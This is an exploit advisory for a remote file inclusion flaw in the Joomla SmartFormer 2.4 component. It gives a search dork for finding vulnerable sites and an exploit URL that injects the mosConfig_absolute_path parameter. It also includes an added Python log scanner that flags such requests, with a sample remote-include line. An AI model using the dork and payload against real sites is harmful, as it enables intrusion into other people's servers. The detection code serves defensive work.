Joomla Component com_smartformer v.2.4 RFI Vulnerability

=========================================================
Joomla Component com_smartformer v.2.4 RFI Vulnerability
=========================================================

[+]Title	 : Joomla Component com_smartformer v.2.4 RFI Vulnerability
[+]Software 	 : Joomla Smart Former v. 2.4
[+]Vendor 	 : http://www.itoris.com/
[+]Download 	 : http://www.itoris.com/joomla-form-builder-smartformer.html
[+]Author	 : jos_ali_joe
[+]Contact	 : josalijoe[at]yahoo[dot]com
[+]Home 	 : https://josalijoe.wordpress.com/

########################################################################

Dork : inurl:index.php?option="com_smartformer"

########################################################################

------------------------------------------------------------------------

RFI Exploit

Exploit :

http://example.com/components/com_smartformer/smartformer.php?mosConfig_absolute_path=[ Tecon - Crew ]

--------------------------------------------------------------------------
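
Added example (not part of the original advisory and not the vendor's code): a log check for requests that hit the script path from the exploit URL above and supply mosConfig_absolute_path, which is a Joomla configuration variable name, so any request that supplies it is worth reviewing. It assumes common/combined access-log format; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Script path and parameter name come from the advisory's exploit URL.
COMPONENT_PATH = "/components/com_smartformer/smartformer.php"
PARAM = "mosconfig_absolute_path"

# Client address and request target from a common/combined-format log line.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# A value that starts with a URL scheme or "//" points away from the local disk.
REMOTE_RE = re.compile(r"^(?:[a-z][a-z0-9+.-]+:|//)", re.I)

def classify(target):
    """Return None, 'param-set' or 'remote-include' for one request target."""
    raw_path, _, query = target.partition("?")
    # Decode, collapse repeated slashes and lowercase before comparing paths.
    path = re.sub(r"/+", "/", unquote(raw_path)).lower()
    if not path.endswith(COMPONENT_PATH):
        return None
    verdict = None
    # parse_qsl percent-decodes keys and values once, as PHP does for $_GET.
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key.lower() != PARAM:
            continue
        if REMOTE_RE.match(value.strip()):
            return "remote-include"
        verdict = "param-set"
    return verdict

def scan(lines):
    """Return (client_ip, verdict) for every log line that sets the parameter."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        verdict = classify(m.group("target")) if m else None
        if verdict:
            hits.append((m.group("ip"), verdict))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Nov/2010:10:01:02 +0000] "GET /index.php?option=com_smartformer&Itemid=5 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [12/Nov/2010:10:03:44 +0000] "GET /components/com_smartformer/smartformer.php?mosConfig_absolute_path=http%3A%2F%2Ffiles.example.net%2Fa.txt HTTP/1.1" 200 312',
    '203.0.113.5 - - [12/Nov/2010:10:04:09 +0000] "GET /components/com_smartformer/smartformer.php?mosConfig_absolute_path=/var/www/html HTTP/1.0" 200 298',
    '192.0.2.11 - - [12/Nov/2010:10:05:30 +0000] "GET /components/com_smartformer/smartformer.php HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for ip, verdict in scan(SAMPLE_LOG):
        print(ip, verdict)
```

Only the query string is visible in an access log, so a value sent in a POST body or cookie will not show up in this check.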

Thanx For :

./ guitariznoize - cassaprodigy - cH0cH0bEe - jimmyRomanticDevil - jurank_dankkal

./ ne0 d4rk fl00d3r - nesta - shadowsmaker - wongrantau - zee eichel - All admin , staff and member Tecon - Crew

Special Thanks :

/. Tecon - Crew

My Team : 

./Indonesian Coder

[+] Note : 

[+] Thank you to the Tecon forum, from its staff to its admins; here it feels like I have found a family
    that can accept me as I am. And I ask for guidance from all of you at Tecon ^:)^
    To nesta: thanks, even though I rarely chat with you, every time you comment it really moves me :P
    I'm not gay, by the way, still normal :P

[+] Hacking is not about answers. Hacking is about the path you take to find the answers.
    If you need help, don't ask for the answer;
    ask about the path you should take to find the answer for yourself.

Link : http://packetstormsecurity.org/1011-exploits/joomlasmartformer-rfi.txt
       http://securityreason.com/wlb_show/WLB-2010110011